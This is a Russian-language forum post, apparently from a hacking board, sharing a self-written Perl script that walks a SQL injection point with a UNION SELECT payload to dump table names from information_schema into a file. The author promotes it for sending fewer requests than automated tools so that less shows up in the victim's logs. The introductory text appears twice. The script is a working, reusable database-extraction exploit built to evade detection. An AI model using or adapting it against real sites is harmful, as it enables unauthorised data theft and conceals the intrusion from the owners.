Привет.
Собственно нашел у себя в архивах свой самописный скрипт, часто выручал в дампе БД:
И так, первый #1 - Это URL sql иньекции.
#2 - Это сам запрос, каждый раз его редактировать под себя.
Parser.txt должен быть вритабельный (Пользователям unix)
В чём смысл? А в том, что программы под автоматическое раскручивание SQL иньекций отправляют слишком много мусора (Лишних запросов, что дает очень большое палево в логах)
Прошу камнями не кидатся, если хотите, используйте своё. Просто решил поделиться
Собственно нашел у себя в архивах свой самописный скрипт, часто выручал в дампе БД:
Code:
#!/usr/bin/perl
use LWP::Simple;
$url="http://localhost/sql/?id="; #1
open(FFF,"> parser.txt");
for ($limit=0; ; $limit++) {
inj($limit);
}
sub inj($limit){
$separator="0x3a3a3a";
$sql = "-1+union+select+1,2,unhex(hex(concat(".$separator.",table_name,".$separator.")))+from+information_schema.tables+limit+".$limit.",1+--+"; #2
$data = get($url.$sql);
if ($data =~ /:::(.+):::/){
print (FFF "\n".$1);
print "\n".$1;
}else{ print "\nBye bye...\n"; exit; }
}
close(FFF);И так, первый #1 - Это URL sql иньекции.
#2 - Это сам запрос, каждый раз его редактировать под себя.
Parser.txt должен быть вритабельный (Пользователям unix)
В чём смысл? А в том, что программы под автоматическое раскручивание SQL иньекций отправляют слишком много мусора (Лишних запросов, что дает очень большое палево в логах)
Прошу камнями не кидатся, если хотите, используйте своё. Просто решил поделиться
